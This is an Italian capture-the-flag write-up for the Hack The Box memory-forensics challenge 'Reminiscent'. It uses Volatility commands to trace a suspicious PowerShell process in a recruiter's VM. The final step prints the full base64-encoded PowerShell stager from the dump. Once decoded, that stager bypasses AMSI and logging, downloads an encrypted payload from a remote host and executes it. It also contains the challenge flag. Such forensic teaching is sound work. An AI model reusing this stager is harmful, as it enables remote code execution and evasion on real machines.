Reminiscent

Autore: Lord Shiva Aggiornamento: 15.07.2023 Tempo di lettura: 09 min.
 

È stato rilevato traffico sospetto dal PC virtuale di un recruiter. È stato acquisito un dump della memoria della VM incriminata prima che fosse rimossa dalla rete per l'imaging e l'analisi. Il nostro reclutatore ha affermato di aver ricevuto un'e-mail da qualcuno in merito al proprio curriculum. Una copia dell'e-mail è stata recuperata ed è fornita come riferimento. Trova e decodifica la fonte del malware per trovare il flag.

Nota: trova e decodifica la fonte del malware per trovare il contrassegno. La lettura del file di posta elettronica conosciamo le seguenti informazioni

nome file: curriculum.zip

Nel file che scarichiamo da HTB per la nostra analisi, troviamo i seguenti file: flounder-pc.memdump.elf - imageinfo.txt - Resume.eml

Nel file TXT trovo le seguenti informazioni:

 

Questo file ci fornisce i profili suggeriti di cui potremmo aver bisogno durante l'esecuzione del volatility. Scelgo il primo profilo: Win7SP1x64

E' possibile eseguire comandi che utilizzano plug-in come ad esempio: windows.info per conoscere meglio la macchina compromessa.

Per ottenere la lista dei processi utilizziamo il comando windows.pslist
Questo plugin fornisce processi in esecuzione sulla macchina al momento del dump della memoria. Proprio come eseguire ps su sistema Linux. Avviare volatility con il seguente comando:

$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.pslist

Otteremo il seguente output:

Il risultato non è stato utile, ma troviamo forse che una pawershell (PID: 2752) potrebbe essere sempre in esecuzioni.

Possiamo ottenere connessioni live utilizzando windows.netscan
Questo plugin ci fornisce le connessioni al momento del dump della memoria. Proprio come eseguire il comando netstat.

$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.netstat

Quello che mi ha colpito in questo output sono state le seguenti righe:

0x1fc04490    TCPv4    10.10.100.43    49246    10.10.99.55    80    CLOSED    2752    powershell.exe    -
0x1fc3d320    TCPv4    10.10.100.43    49247    10.10.99.55    80    CLOSED    2752    powershell.exe    -

Anche se queste connessioni sono state chiuse, ci sono alcuni segnali allarmanti:

  • Che ci sia powershell.exe, anche se potrebbe essere benigno, è possibile che questo possa essere usato per configurare la shell inversa.
  • Che ci sia comunicazione con la porta "80" usando powershell.exe. Ciò si capisce perché un utente normale (che non è così esperto di tecnologia) non utilizzerà "powershell.exe" per comunicare con un sito web.

Scarichiamo il comando che sarebbe stato utilizzato per chiamare powershell.exe per capire meglio cosa è successo.

Per ottenere il comando eseguito possiamo utilizzare windows.cmdline:

$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.cmdline

In questo caso l'output mostra tutti i comandi che sono stati eseguiti. Per andare nello specifico del PID in questione possiamo utilizzare il seguente comando:

$ /opt/volatility3/vol.py -f flounder-pc-memdump.elf windows.cmdline --pid 2752

Quindi powershell.exe viene chiamato con il comando -enc che utilizza la codifica base64.
Per decodificare la stringa è possibile utilizzare il seguente comando:

$ echo -n JABHAHIAbwBVAFAAUABPAEwAaQBDAFkAUwBFAHQAdABJAE4ARwBzACAAPQAgAFsAcgBFAEYAXQAuAEEAUwBzAGUATQBCAEwAWQAuAEcARQB0AFQAeQBwAEUAKAAnAFMAeQBzAHQAZQBtAC4ATQBhAG4AYQBnAGUAbQBlAG4AdAAuAEEAdQB0AG8AbQBhAHQAaQBvAG4ALgBVAHQAaQBsAHMAJwApAC4AIgBHAEUAdABGAEkARQBgAGwAZAAiACgAJwBjAGEAYwBoAGUAZABHAHIAbwB1AHAAUABvAGwAaQBjAHkAUwBlAHQAdABpAG4AZwBzACcALAAgACcATgAnACsAJwBvAG4AUAB1AGIAbABpAGMALABTAHQAYQB0AGkAYwAnACkALgBHAEUAVABWAGEAbABVAGUAKAAkAG4AdQBsAEwAKQA7ACQARwBSAG8AdQBQAFAATwBsAEkAQwB5AFMAZQBUAFQAaQBOAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCACcAKwAnAGwAbwBjAGsATABvAGcAZwBpAG4AZwAnAF0AIAA9ACAAMAA7ACQARwBSAG8AdQBQAFAATwBMAEkAQwBZAFMARQB0AFQAaQBuAGcAUwBbACcAUwBjAHIAaQBwAHQAQgAnACsAJwBsAG8AYwBrAEwAbwBnAGcAaQBuAGcAJwBdAFsAJwBFAG4AYQBiAGwAZQBTAGMAcgBpAHAAdABCAGwAbwBjAGsASQBuAHYAbwBjAGEAdABpAG8AbgBMAG8AZwBnAGkAbgBnACcAXQAgAD0AIAAwADsAWwBSAGUAZgBdAC4AQQBzAFMAZQBtAEIAbAB5AC4ARwBlAFQAVAB5AFAARQAoACcAUwB5AHMAdABlAG0ALgBNAGEAbgBhAGcAZQBtAGUAbgB0AC4AQQB1AHQAbwBtAGEAdABpAG8AbgAuAEEAbQBzAGkAVQB0AGkAbABzACcAKQB8AD8AewAkAF8AfQB8ACUAewAkAF8ALgBHAEUAdABGAGkAZQBMAGQAKAAnAGEAbQBzAGkASQBuAGkAdABGAGEAaQBsAGUAZAAnACwAJwBOAG8AbgBQAHUAYgBsAGkAYwAsAFMAdABhAHQAaQBjACcAKQAuAFMARQBUAFYAYQBMAHUARQAoACQATgB1AGwATAAsACQAVAByAHUAZQApAH0AOwBbAFMAeQBzAFQAZQBtAC4ATgBlAFQALgBTAEUAcgBWAEkAYwBlAFAATwBJAG4AdABNAEEAbgBBAGcARQBSAF0AOgA6AEUAeABwAEUAYwB0ADEAMAAwAEMATwBuAFQAaQBuAHUARQA9ADAAOwAkAFcAQwA9AE4ARQBXAC0ATwBCAGoARQBjAFQAIABTAHkAcwBUAEUATQAuAE4ARQB0AC4AVwBlAEIAQwBsAEkARQBuAHQAOwAkAHUAPQAnAE0AbwB6AGkAbABsAGEALwA1AC4AMAAgACgAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAIABXAE8AVwA2ADQAOwAgAFQAcgBpAGQAZQBuAHQALwA3AC4AMAA7ACAAcgB2ADoAMQAxAC4AMAApACAAbABpAGsAZQAgAEcAZQBjAGsAbwAnADsAJAB3AEMALgBIAGUAYQBEAGUAcgBTAC4AQQBkAGQAKAAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwAsACQAdQApADsAJABXAGMALgBQAFIAbwBYAHkAPQBbAFMAeQBzAFQAZQBNAC4ATgBFAFQALgBXAGUAYgBSAGUAcQB1AEUAcwB0AF0AOgA6AEQAZQBmAGEAVQBMAHQAVwBlAEIAUABSAE8AWABZADsAJAB3AEMALgBQAFIAbwBYAFkALgBDAFIARQBEAGUATgB0AEkAYQBMAFMAIAA9ACAAWwBTAFkAUwBUAGUATQAuAE4ARQBUAC4AQwByAGUARABFAG4AVABpAGEATABDAGEAQwBoAGUAXQA6ADoARABlAEYAYQB1AEwAVABOAEUAdAB3AE8AcgBrAEMAcgBlAGQAZQBuAHQAaQBBAGwAUwA7ACQASwA9AFsAUwBZAFMAdABFAE0ALgBUAGUAeAB0AC4ARQBOAEMATwBEAEkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcARQB0AEIAeQB0AEUAcwAoACcARQAxAGcATQBHAGQAZgBUAEAAZQBvAE4APgB4ADkAewBdADIARgA3ACsAYgBzAE8AbgA0AC8AUwBpAFEAcgB3ACcAKQA7ACQAUgA9AHsAJABEACwAJABLAD0AJABBAHIAZwBTADsAJABTAD0AMAAuAC4AMgA1ADUAOwAwAC4ALgAyADUANQB8ACUAewAkAEoAPQAoACQASgArACQAUwBbACQAXwBdACsAJABLAFsAJABfACUAJABLAC4AQwBvAHUAbgBUAF0AKQAlADIANQA2ADsAJABTAFsAJABfAF0ALAAkAFMAWwAkAEoAXQA9ACQAUwBbACQASgBdACwAJABTAFsAJABfAF0AfQA7ACQARAB8ACUAewAkAEkAPQAoACQASQArADEAKQAlADIANQA2ADsAJABIAD0AKAAkAEgAKwAkAFMAWwAkAEkAXQApACUAMgA1ADYAOwAkAFMAWwAkAEkAXQAsACQAUwBbACQASABdAD0AJABTAFsAJABIAF0ALAAkAFMAWwAkAEkAXQA7ACQAXwAtAGIAeABvAFIAJABTAFsAKAAkAFMAWwAkAEkAXQArACQAUwBbACQASABdACkAJQAyADUANgBdAH0AfQA7ACQAdwBjAC4ASABFAEEAZABFAHIAcwAuAEEARABEACgAIgBDAG8AbwBrAGkAZQAiACwAIgBzAGUAcwBzAGkAbwBuAD0ATQBDAGEAaAB1AFEAVgBmAHoAMAB5AE0ANgBWAEIAZQA4AGYAegBWADkAdAA5AGoAbwBtAG8APQAiACkAOwAkAHMAZQByAD0AJwBoAHQAdABwADoALwAvADEAMAAuADEAMAAuADkAOQAuADUANQA6ADgAMAAnADsAJAB0AD0AJwAvAGwAbwBnAGkAbgAvAHAAcgBvAGMAZQBzAHMALgBwAGgAcAAnADsAJABmAGwAYQBnAD0AJwBIAFQAQgB7ACQAXwBqADAARwBfAHkAMAB1AFIAXwBNADMAbQAwAHIAWQBfACQAfQAnADsAJABEAGEAdABBAD0AJABXAEMALgBEAG8AVwBOAEwAbwBhAEQARABBAFQAQQAoACQAUwBlAFIAKwAkAHQAKQA7ACQAaQB2AD0AJABkAGEAVABBAFsAMAAuAC4AMwBdADsAJABEAEEAdABhAD0AJABEAGEAVABhAFsANAAuAC4AJABEAEEAdABhAC4ATABlAG4ARwBUAEgAXQA7AC0ASgBPAEkATgBbAEMASABBAHIAWwBdAF0AKAAmACAAJABSACAAJABkAGEAdABBACAAKAAkAEkAVgArACQASwApACkAfABJAEUAWAA= |base64 -d

 E a questo punto potrai sicuramente notare la tua Flag... :-)

HTB{$_j.............Y_$}